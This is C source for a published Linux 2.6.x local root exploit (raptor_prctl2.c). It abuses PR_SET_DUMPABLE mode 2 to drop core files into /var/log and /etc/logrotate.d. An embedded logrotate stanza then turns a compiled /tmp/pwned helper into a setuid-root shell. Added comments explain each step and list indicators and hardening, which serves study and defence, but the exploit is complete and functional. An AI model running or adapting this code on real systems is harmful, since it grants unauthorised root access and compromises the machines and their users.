- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <signal.h>
- #include <sys/stat.h>
- #include <sys/resource.h>
- #include <sys/prctl.h>
- #define INFO1 "raptor_prctl2.c - Linux 2.6.x suid_dumpable2 (logrotate)" /* banner line 1, printed by main() */
- #define INFO2 "Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>" /* banner line 2, printed by main() */
- char payload[] = /* logrotate configuration stanza for /var/log/core. Its
-    firstaction script would run with logrotate's privileges: it makes
-    /tmp/pwned root-owned and mode 4755 (setuid), then deletes
-    /etc/logrotate.d/core and the /var/log/core files.
-    NOTE(review): main() never references this array; presumably it matters
-    only because it is part of the process image that ends up in the core
-    files -- confirm.
-    Defender view: the paths in this string are the indicators to hunt for
-    (/tmp/pwned, /etc/logrotate.d/core, /var/log/core). The stanza removes
-    the two core files itself, so after logrotate has run the lasting
-    artifact would be a setuid-root /tmp/pwned. */
- "\n/var/log/core {\n daily\n size=0\n firstaction\n chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f /etc/logrotate.d/core; rm -f /var/log/core*\n endscript\n}\n";
- char pwnage[] = /* shell command line handed to system() in main(): writes a
-    one-line C source to /tmp/pwned.c, compiles it with gcc into /tmp/pwned
-    (compiler output discarded) and removes the source. The helper calls
-    setuid(0) and setgid(0) and then starts /bin/sh; it is harmless until
-    something makes the binary setuid root, which is what the payload
-    stanza is written to do. The author's stated reason for the helper is
-    "to circumvent bash checks". */
- "echo \"main(){setuid(0);setgid(0);system(\\\"/bin/sh\\\");}\" > /tmp/pwned.c; gcc /tmp/pwned.c -o /tmp/pwned &>/dev/null; rm -f /tmp/pwned.c";
- int main(void) /* Proof-of-concept driver for the issue named in INFO1.
-    Visible steps: build /tmp/pwned, request an unlimited core size, fork two
-    children that chdir into /var/log and /etc/logrotate.d, set dumpable
-    mode 2 and are then sent SIGSEGV, and finally stat() the two expected
-    "core" files. Ends through exit(): 0 when both files exist, 1 otherwise.
-    The results of system, setrlimit, fork, chdir, prctl and kill are never
-    checked. */
- {
- int pid; /* value returned by fork(); reused for both children */
- struct rlimit corelimit; /* new soft/hard values for RLIMIT_CORE */
- struct stat st; /* scratch buffer; only stat()'s return code is used */
- /* print the banner (INFO1, INFO2) on stderr */
- fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
- /* run the pwnage shell command: it writes, compiles and removes
-    /tmp/pwned.c, leaving /tmp/pwned as an ordinary, not yet setuid, binary.
-    The exit status is ignored, so a failed build goes unnoticed here. */
- system(pwnage);
- /* ask for soft and hard core-size limits of RLIM_INFINITY so a dump is not
-    truncated or suppressed; raising a hard limit normally needs privilege,
-    and a failure of setrlimit() is silently ignored */
- corelimit.rlim_cur = RLIM_INFINITY;
- corelimit.rlim_max = RLIM_INFINITY;
- setrlimit(RLIMIT_CORE, &corelimit);
- /* first child: creates the /var/log/core file that the payload stanza
-    names as its log file. The child makes /var/log its working directory,
-    requests dumpable mode 2 and waits to be signalled. Presumably the
-    kernels named in INFO1 honoured mode 2 for an unprivileged caller and
-    wrote the dump with root privileges into the working directory, which
-    is the flaw being demonstrated. NOTE(review): prctl(2) documents that
-    this value can no longer be set through prctl on later kernels --
-    confirm against the kernel actually deployed. */
- if (!(pid = fork())) {
- chdir("/var/log");
- prctl(PR_SET_DUMPABLE, 2);
- sleep(666); /* placeholder wait; the parent's SIGSEGV is expected first */
- exit(1); /* reached only if no signal was delivered */
- }
- kill(pid, SIGSEGV); /* NOTE(review): if fork() failed, pid is -1 and this call signals every process the caller may signal */
- /* second child: same sequence with /etc/logrotate.d as the working
-    directory, so the dump would land where the final message expects
-    logrotate to pick it up. Defender view: a file named core inside a
-    configuration directory read by a privileged job is the detection
-    point; keeping core dumps out of the process working directory
-    (for example via kernel.core_pattern) or disabling them is the usual
-    hardening for this class of issue, besides running a fixed kernel. */
- if (!(pid = fork())) {
- chdir("/etc/logrotate.d");
- prctl(PR_SET_DUMPABLE, 2);
- sleep(666); /* placeholder wait, as in the first child */
- exit(1); /* reached only if no signal was delivered */
- }
- kill(pid, SIGSEGV); /* same unchecked-fork caveat as the first kill() */
- /* give the kernel three seconds to write the dumps, then require both
-    files to exist; a missing file is reported as "Not vulnerable?" */
- sleep(3);
- if ((stat("/var/log/core", &st) < 0) ||
- (stat("/etc/logrotate.d/core", &st) < 0)) {
- fprintf(stderr, "Error: Not vulnerable? See comments.\n");
- exit(1);
- }
- /* both files exist: nothing privileged has happened yet. The program only
-    prints a reminder and exits; any privileged action would occur later,
-    when logrotate itself runs. */
- fprintf(stderr, "Please wait until logrotate is run and check /tmp/pwned;)\n");
- exit(0);
- }